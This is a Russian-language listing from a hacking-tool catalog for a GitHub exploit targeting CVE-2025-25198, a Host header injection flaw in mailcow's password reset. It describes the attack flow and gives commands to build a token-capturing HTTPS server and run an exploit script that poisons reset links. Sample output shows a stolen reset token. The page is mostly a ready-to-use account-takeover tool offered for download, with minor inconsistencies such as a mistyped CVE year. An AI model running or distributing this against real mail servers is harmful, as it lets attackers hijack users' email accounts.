Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-25198 — Захватывает токены сброса пароля при атаках через инъекцию Host-заголовка в Mailcow. | Kitploit
Инструменты/GitHubGitHub/enzocipher/cve-2025-25198
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

Захватывает токены сброса пароля при атаках через инъекцию Host-заголовка в Mailcow.

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-25198

mailcow: dockerized — это открытый групповой почтовый комплект на основе docker. До версии 2025-01a уязвимость в функции сброса пароля mailcow позволяет злоумышленнику манипулировать заголовком Host HTTP для генерации ссылки сброса пароля, указывающей на контролируемый злоумышленником домен. Это может привести к захвату учётной записи, если пользователь перейдёт по отравленной ссылке.

Как это работает?

Запускает https-сервер для приёма всех запросов и отправляет POST-запрос на сайт с заголовком Host, содержащим выбранный вами . Вы также можете использовать Burpsuite для отправки запроса и получения токена на сервере.

Возможности

  • HTTPS-сервер, который получает токен смены пароля
  • Эксплойт-скрипт, атакующий уязвимость веб-сайта.
  • Всё исправлено, и openssl больше не требуется для работы

Предварительные требования

  • Go 1.16 или выше

Серверный скрипт

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

Эксплойт-скрипт

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optional >

После небольшого ожидания сервер выведет токен, который вы можете использовать:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
Скачать инструмент